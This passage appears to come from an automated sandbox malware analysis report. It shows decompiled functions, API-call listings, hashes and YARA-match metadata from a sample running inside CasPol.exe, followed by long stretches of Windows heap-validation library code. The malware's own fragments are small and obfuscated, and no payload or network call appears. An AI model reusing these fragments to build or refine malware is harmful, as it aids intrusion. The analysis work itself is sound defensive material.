				asm("lock add al, 0x90");
				if ((__esi & 0xa4ccb534) > 0) goto L3;
			}





                                                                0x0041ea14
                                                                0x0041ea15
                                                                0x0041ea18
                                                                0x0041ea1f
                                                                0x0041ea22

                                                                APIs
                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040FEA5,0040FEA5,?,00000000,?,?), ref: 0041EA53
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LookupPrivilegeValue
                                                                • String ID:
                                                                • API String ID: 3899507212-0
                                                                • Opcode ID: 0478b1b25585e0891a21a8d37a493bd511bcff86288ff7cb9802514e3dc0006c
                                                                • Instruction ID: dc27cc2fb198ade2d17280a16e8467aa7d15497bed9ff9f470af9842353000fa
                                                                • Opcode Fuzzy Hash: 0478b1b25585e0891a21a8d37a493bd511bcff86288ff7cb9802514e3dc0006c
                                                                • Instruction Fuzzy Hash: 93F081B5A042046FC710DF99EC45EE7376DEF84354F05885AFD088B242D235E9118BE4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0041E8B5 Relevance: 1.5, APIs: 1, Instructions: 31memoryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 325 41e8b5-41e8b9 326 41e8d4-41e8d9 325->326 327 41e8bb-41e8d2 325->327 328 41e8df-41e8f4 RtlFreeHeap 326->328 329 41e8da call 41f223 326->329 327->326 329->328
                                                                APIs
                                                                • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,622BA63F,00000000,?), ref: 0041E8F0
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FreeHeap
                                                                • String ID:
                                                                • API String ID: 3298025750-0
                                                                • Opcode ID: 185113c4ed9c95c0ad52ebe8323c515ce5dfcfe1b1fe3ad59e1e53c3d55ff7ff
                                                                • Instruction ID: a70d32c483ad18cc0f7891c95980f67120d115bce4dbab14678b91748736c37b
                                                                • Opcode Fuzzy Hash: 185113c4ed9c95c0ad52ebe8323c515ce5dfcfe1b1fe3ad59e1e53c3d55ff7ff
                                                                • Instruction Fuzzy Hash: 55F0A0756402006FCB18DF95DC45EEB3B7AEF89390F204459F90997282C230EC06CBB1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0041E84A Relevance: 1.5, APIs: 1, Instructions: 25memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,622BA63F,00000000,?), ref: 0041E8F0
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FreeHeap
                                                                • String ID:
                                                                • API String ID: 3298025750-0
                                                                • Opcode ID: a673fe6a02c8b6dc377b40048003395d9bc84ae260032fac4b060643fadd817f
                                                                • Instruction ID: 03fdbb8d33d7dfe1cc8dd0dec87e9036be8be9c52387b500572499a6dd56ba50
                                                                • Opcode Fuzzy Hash: a673fe6a02c8b6dc377b40048003395d9bc84ae260032fac4b060643fadd817f
                                                                • Instruction Fuzzy Hash: E4E0D8F40152851FDB14FFAAA8908977BD9AF46204710499EEC944B606C121D5599B71
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00410053 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 16%
                                                                			E00410053(intOrPtr _a4) {
				intOrPtr* _t7;
				void* _t8;

				asm("in al, dx");
				_t7 = E004195B3(_a4 + 0x20,  *((intOrPtr*)(_a4 + 0x9cc)), 0, 0, 0x998e91b2);
				if(_t7 != 0) {
					_t8 =  *_t7(0x10); // executed
					return 0 | _t8 == 0x000000f1;
				} else {
					return _t7;
				}
			}





                                                                0x00410055
                                                                0x0041006d
                                                                0x00410077
                                                                0x0041007d
                                                                0x0041008c
                                                                0x0041007a
                                                                0x0041007a
                                                                0x0041007a

                                                                APIs
                                                                • GetUserGeoID.KERNELBASE(00000010), ref: 0041007D
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: User
                                                                • String ID:
                                                                • API String ID: 765557111-0
                                                                • Opcode ID: 8db12a4c292c9c454df692e40dc31025b76cec024ff7aae76387fcd38685c7b4
                                                                • Instruction ID: 5be84a47f02960c0b1cba54ed20fb3a3f1d3a2dc5609808b463c0820bd0c15be
                                                                • Opcode Fuzzy Hash: 8db12a4c292c9c454df692e40dc31025b76cec024ff7aae76387fcd38685c7b4
                                                                • Instruction Fuzzy Hash: B2E0C27368030466FA2091A59C42FB6364F5B84B00F048475F90CE62C2D5A8E8C00018
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0041E8C3 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,622BA63F,00000000,?), ref: 0041E8F0
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FreeHeap
                                                                • String ID:
                                                                • API String ID: 3298025750-0
                                                                • Opcode ID: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
                                                                • Instruction ID: 5326cad36f1cd3682148bf768eca4d2391bf05bb07e48d38a5f889d0d41c1adc
                                                                • Opcode Fuzzy Hash: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
                                                                • Instruction Fuzzy Hash: 54E012B5600208ABCB14EF89EC49EA737ACAF88754F018459BA095B282C630E914CAB1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0041E883 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E0041E883(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;

				_t3 = _a4 + 0xa9c; // 0xa9c
				E0041F223( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                                0x0041e892
                                                                0x0041e89a
                                                                0x0041e8b0
                                                                0x0041e8b4

                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(00418C66,?,00419410,00419410,?,00418C66,00000000,?,?,?,?,00000000,00000000,00000002), ref: 0041E8B0
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateHeap
                                                                • String ID:
                                                                • API String ID: 1279760036-0
                                                                • Opcode ID: bededf418e3a0274c804535d3b84133155b4e078891fc5e6f2d2b0bfe9395de7
                                                                • Instruction ID: f5ae067db63c9ddd1b8e3113497bae5bcd77b30f1fcc8f0db147245146a0e1c6
                                                                • Opcode Fuzzy Hash: bededf418e3a0274c804535d3b84133155b4e078891fc5e6f2d2b0bfe9395de7
                                                                • Instruction Fuzzy Hash: EBE046B6600208ABCB14EF89EC45EE737ACEF88764F018459FE085B242C630F914CAF1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0041EA23 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040FEA5,0040FEA5,?,00000000,?,?), ref: 0041EA53
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LookupPrivilegeValue
                                                                • String ID:
                                                                • API String ID: 3899507212-0
                                                                • Opcode ID: 3b3ebc9dfdd07f93e5458a11869c6f41762809d127f29865181a2f9f364af2cb
                                                                • Instruction ID: 0b19f6a055a19a2633036f6401d78d8d10b6211b82747d2c4bdb0d8f64ca6bac
                                                                • Opcode Fuzzy Hash: 3b3ebc9dfdd07f93e5458a11869c6f41762809d127f29865181a2f9f364af2cb
                                                                • Instruction Fuzzy Hash: DFE01AB56002046BC710DF89DC45FE737ADAF88654F054469BA0857242D635E8148AF5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0166967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 62788ee0f85626fa7ea6af96358dc6e5d2e66addf6def06f7a2292ef831ed2be
                                                                • Instruction ID: bb9560fde6d34c67ef3b647cdf3193900f81a6514fb9c13ef31c866d6f41cf1e
                                                                • Opcode Fuzzy Hash: 62788ee0f85626fa7ea6af96358dc6e5d2e66addf6def06f7a2292ef831ed2be
                                                                • Instruction Fuzzy Hash: A1B02B718010C0C9F601D7A00F087173A047BC0300F12C011D1020240B4338C080F1B1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Non-executed Functions

                                                                Function 016DB260 Relevance: 37.8, Strings: 30, Instructions: 262COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                Strings
                                                                • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 016DB3D6
                                                                • Go determine why that thread has not released the critical section., xrefs: 016DB3C5
                                                                • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 016DB314
                                                                • a NULL pointer, xrefs: 016DB4E0
                                                                • *** enter .exr %p for the exception record, xrefs: 016DB4F1
                                                                • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 016DB2DC
                                                                • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 016DB38F
                                                                • write to, xrefs: 016DB4A6
                                                                • *** then kb to get the faulting stack, xrefs: 016DB51C
                                                                • *** A stack buffer overrun occurred in %ws:%s, xrefs: 016DB2F3
                                                                • *** An Access Violation occurred in %ws:%s, xrefs: 016DB48F
                                                                • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 016DB39B
                                                                • The resource is owned exclusively by thread %p, xrefs: 016DB374
                                                                • This failed because of error %Ix., xrefs: 016DB446
                                                                • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 016DB53F
                                                                • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 016DB47D
                                                                • The instruction at %p tried to %s , xrefs: 016DB4B6
                                                                • <unknown>, xrefs: 016DB27E, 016DB2D1, 016DB350, 016DB399, 016DB417, 016DB48E
                                                                • The resource is owned shared by %d threads, xrefs: 016DB37E
                                                                • The critical section is owned by thread %p., xrefs: 016DB3B9
                                                                • *** enter .cxr %p for the context, xrefs: 016DB50D
                                                                • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 016DB323
                                                                • *** Resource timeout (%p) in %ws:%s, xrefs: 016DB352
                                                                • The instruction at %p referenced memory at %p., xrefs: 016DB432
                                                                • *** Inpage error in %ws:%s, xrefs: 016DB418
                                                                • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 016DB484
                                                                • read from, xrefs: 016DB4AD, 016DB4B2
                                                                • an invalid address, %p, xrefs: 016DB4CF
                                                                • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 016DB305
                                                                • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 016DB476
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                • API String ID: 0-108210295
                                                                • Opcode ID: 406f41d13c2e43279519eabac01722cc20c941e8b78aa73e548e3a3c4f070e23
                                                                • Instruction ID: 8cb526e7211507becbfeaa21dcd7bf8c743417aa3a3fbf9616589fcdfd72e335
                                                                • Opcode Fuzzy Hash: 406f41d13c2e43279519eabac01722cc20c941e8b78aa73e548e3a3c4f070e23
                                                                • Instruction Fuzzy Hash: D3814335E00210FFDB229E4A8C89DBF3F26AF57A51F4A405CF5065B21ED3628552DBB2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016E1C06 Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 44%
                                                                			E016E1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x16048a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0162B150();
				} else {
					E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x171589c);
				E0162B150("Heap error detected at %p (heap handle %p)\n",  *0x17158a0);
				_t27 =  *0x1715898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M016E1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0162B150();
				} else {
					E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0162B150("Error code: %d - %s\n",  *0x1715898);
				_t113 =  *0x17158a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0162B150();
					} else {
						E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0162B150("Parameter1: %p\n",  *0x17158a4);
				}
				_t115 =  *0x17158a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0162B150();
					} else {
						E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0162B150("Parameter2: %p\n",  *0x17158a8);
				}
				_t117 =  *0x17158ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0162B150();
					} else {
						E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0162B150("Parameter3: %p\n",  *0x17158ac);
				}
				_t119 =  *0x17158b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0162B150();
					} else {
						E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x17158b4);
					E0162B150("Last known valid blocks: before - %p, after - %p\n",  *0x17158b0);
				} else {
					_t120 =  *0x17158b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0162B150();
				} else {
					E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0162B150("Stack trace available at %p\n", 0x17158c0);
			}











                                                                0x016e1c10
                                                                0x016e1c16
                                                                0x016e1c1e
                                                                0x016e1c3d
                                                                0x016e1c3e
                                                                0x016e1c20
                                                                0x016e1c35
                                                                0x016e1c3a
                                                                0x016e1c44
                                                                0x016e1c55
                                                                0x016e1c5a
                                                                0x016e1c65
                                                                0x016e1c67
                                                                0x00000000
                                                                0x016e1c6e
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x016e1c67
                                                                0x016e1cdc
                                                                0x016e1ce5
                                                                0x016e1d04
                                                                0x016e1d05
                                                                0x016e1ce7
                                                                0x016e1cfc
                                                                0x016e1d01
                                                                0x016e1d0b
                                                                0x016e1d17
                                                                0x016e1d1f
                                                                0x016e1d25
                                                                0x016e1d30
                                                                0x016e1d4f
                                                                0x016e1d50
                                                                0x016e1d32
                                                                0x016e1d47
                                                                0x016e1d4c
                                                                0x016e1d61
                                                                0x016e1d67
                                                                0x016e1d68
                                                                0x016e1d6e
                                                                0x016e1d79
                                                                0x016e1d98
                                                                0x016e1d99
                                                                0x016e1d7b
                                                                0x016e1d90
                                                                0x016e1d95
                                                                0x016e1daa
                                                                0x016e1db0
                                                                0x016e1db1
                                                                0x016e1db7
                                                                0x016e1dc2
                                                                0x016e1de1
                                                                0x016e1de2
                                                                0x016e1dc4
                                                                0x016e1dd9
                                                                0x016e1dde
                                                                0x016e1df3
                                                                0x016e1df9
                                                                0x016e1dfa
                                                                0x016e1e00
                                                                0x016e1e0a
                                                                0x016e1e13
                                                                0x016e1e32
                                                                0x016e1e33
                                                                0x016e1e15
                                                                0x016e1e2a
                                                                0x016e1e2f
                                                                0x016e1e39
                                                                0x016e1e4a
                                                                0x016e1e02
                                                                0x016e1e02
                                                                0x016e1e08
                                                                0x00000000
                                                                0x00000000
                                                                0x016e1e08
                                                                0x016e1e5b
                                                                0x016e1e7a
                                                                0x016e1e7b
                                                                0x016e1e5d
                                                                0x016e1e72
                                                                0x016e1e77
                                                                0x016e1e95

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                • API String ID: 0-2897834094
                                                                • Opcode ID: 55b39cd9c9ef846abe801d19d60f565cd365e906641be0297e0970aa5bd4c4e1
                                                                • Instruction ID: 0f0c4406279c90ae81d873b17d80fed868cbc8abc9dd52ddac2c303a71fecc6c
                                                                • Opcode Fuzzy Hash: 55b39cd9c9ef846abe801d19d60f565cd365e906641be0297e0970aa5bd4c4e1
                                                                • Instruction Fuzzy Hash: A761F433592551CFD316AB89DC8CE2173E5EB06E31B5D812EFC0A9B341D63698919F0D
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016E4AEF Relevance: 11.8, Strings: 9, Instructions: 529COMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 59%
                                                                			E016E4AEF(void* __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t189;
				intOrPtr _t191;
				intOrPtr _t210;
				signed int _t225;
				signed char _t231;
				intOrPtr _t232;
				unsigned int _t245;
				intOrPtr _t249;
				intOrPtr _t259;
				signed int _t281;
				signed int _t283;
				intOrPtr _t284;
				signed int _t288;
				signed int* _t294;
				signed int* _t298;
				intOrPtr* _t299;
				intOrPtr* _t300;
				signed int _t307;
				signed int _t309;
				signed short _t312;
				signed short _t315;
				signed int _t317;
				signed int _t320;
				signed int _t322;
				signed int _t326;
				signed int _t327;
				void* _t328;
				signed int _t332;
				signed int _t340;
				signed int _t342;
				signed char _t344;
				signed int* _t345;
				void* _t346;
				signed char _t352;
				signed char _t367;
				signed int _t374;
				intOrPtr* _t378;
				signed int _t380;
				signed int _t385;
				signed char _t390;
				unsigned int _t392;
				signed char _t395;
				unsigned int _t397;
				intOrPtr* _t400;
				signed int _t402;
				signed int _t405;
				intOrPtr* _t406;
				signed int _t407;
				intOrPtr _t412;
				void* _t414;
				signed int _t415;
				signed int _t416;
				signed int _t429;

				_v16 = _v16 & 0x00000000;
				_t189 = 0;
				_v8 = _v8 & 0;
				_t332 = __edx;
				_v12 = 0;
				_t414 = __ecx;
				_t415 = __edx;
				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
					L88:
					_t416 = _v16;
					if( *((intOrPtr*)(_t332 + 0x2c)) == _t416) {
						__eflags =  *((intOrPtr*)(_t332 + 0x30)) - _t189;
						if( *((intOrPtr*)(_t332 + 0x30)) == _t189) {
							L107:
							return 1;
						}
						_t191 =  *[fs:0x30];
						__eflags =  *(_t191 + 0xc);
						if( *(_t191 + 0xc) == 0) {
							_push("HEAP: ");
							E0162B150();
						} else {
							E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v12);
						_push( *((intOrPtr*)(_t332 + 0x30)));
						_push(_t332);
						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
						L122:
						E0162B150();
						L119:
						return 0;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E0162B150();
					} else {
						E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t416);
					_push( *((intOrPtr*)(_t332 + 0x2c)));
					_push(_t332);
					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
					goto L122;
				} else {
					goto L1;
				}
				do {
					L1:
					 *_a16 = _t415;
					if( *(_t414 + 0x4c) != 0) {
						_t392 =  *(_t414 + 0x50) ^  *_t415;
						 *_t415 = _t392;
						_t352 = _t392 >> 0x00000010 ^ _t392 >> 0x00000008 ^ _t392;
						_t424 = _t392 >> 0x18 - _t352;
						if(_t392 >> 0x18 != _t352) {
							_push(_t352);
							E016DFA2B(_t332, _t414, _t415, _t414, _t415, _t424);
						}
					}
					if(_v8 != ( *(_t415 + 4) ^  *(_t414 + 0x54))) {
						_t210 =  *[fs:0x30];
						__eflags =  *(_t210 + 0xc);
						if( *(_t210 + 0xc) == 0) {
							_push("HEAP: ");
							E0162B150();
						} else {
							E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v8 & 0x0000ffff);
						_t340 =  *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff;
						__eflags = _t340;
						_push(_t340);
						E0162B150("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t415);
						L117:
						__eflags =  *(_t414 + 0x4c);
						if( *(_t414 + 0x4c) != 0) {
							 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
							 *_t415 =  *_t415 ^  *(_t414 + 0x50);
							__eflags =  *_t415;
						}
						goto L119;
					}
					_t225 =  *_t415 & 0x0000ffff;
					_t390 =  *(_t415 + 2);
					_t342 = _t225;
					_v8 = _t342;
					_v20 = _t342;
					_v28 = _t225 << 3;
					if((_t390 & 0x00000001) == 0) {
						__eflags =  *(_t414 + 0x40) & 0x00000040;
						_t344 = (_t342 & 0xffffff00 | ( *(_t414 + 0x40) & 0x00000040) != 0x00000000) & _t390 >> 0x00000002;
						__eflags = _t344 & 0x00000001;
						if((_t344 & 0x00000001) == 0) {
							L66:
							_t345 = _a12;
							 *_a8 =  *_a8 + 1;
							 *_t345 =  *_t345 + ( *_t415 & 0x0000ffff);
							__eflags =  *_t345;
							L67:
							_t231 =  *(_t415 + 6);
							if(_t231 == 0) {
								_t346 = _t414;
							} else {
								_t346 = (_t415 & 0xffff0000) - ((_t231 & 0x000000ff) << 0x10) + 0x10000;
							}
							if(_t346 != _t332) {
								_t232 =  *[fs:0x30];
								__eflags =  *(_t232 + 0xc);
								if( *(_t232 + 0xc) == 0) {
									_push("HEAP: ");
									E0162B150();
								} else {
									E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t415 + 6) & 0x000000ff);
								_push(_t415);
								_push("Heap block at %p has incorrect segment offset (%x)\n");
								goto L95;
							} else {
								if( *((char*)(_t415 + 7)) != 3) {
									__eflags =  *(_t414 + 0x4c);
									if( *(_t414 + 0x4c) != 0) {
										 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
										 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										__eflags =  *_t415;
									}
									_t415 = _t415 + _v28;
									__eflags = _t415;
									goto L86;
								}
								_t245 =  *(_t415 + 0x1c);
								if(_t245 == 0) {
									_t395 =  *_t415 & 0x0000ffff;
									_v6 = _t395 >> 8;
									__eflags = _t415 + _t395 * 8 -  *((intOrPtr*)(_t332 + 0x28));
									if(_t415 + _t395 * 8 ==  *((intOrPtr*)(_t332 + 0x28))) {
										__eflags =  *(_t414 + 0x4c);
